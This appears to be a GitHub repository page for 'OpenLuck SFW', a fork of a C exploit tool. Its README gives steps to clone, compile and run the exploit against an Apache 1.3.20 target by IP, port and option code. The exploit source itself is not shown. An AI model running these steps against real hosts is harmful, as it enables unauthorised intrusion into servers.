rufflabs / OpenLuck

OpenLuck SFW

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

OpenLuck SFW

Fork of OpenLuck, made SFW!

Usage

  1. Download OpenLuck.c
git clone https://github.com/rufflabs/OpenLuck.git
  1. Install ssl-dev library
apt-get install libssl-dev
  1. It's Compile Time
gcc -o OpenLuck OpenLuck.c -lcrypto
  1. Running the Exploit
./OpenLuck
  1. See which service you witch to exploit. For example if you need to Red Hat Linux, using apache version 1.3.20. Trying out using the 0x6a option ./OpenLuck 0x6a [Target Ip] [port] -c 40

for example:

./OpenLuck 0x6a 192.168.80.145 443 -c 40

About

OpenLuck SFW


Languages

Language:C 100.0%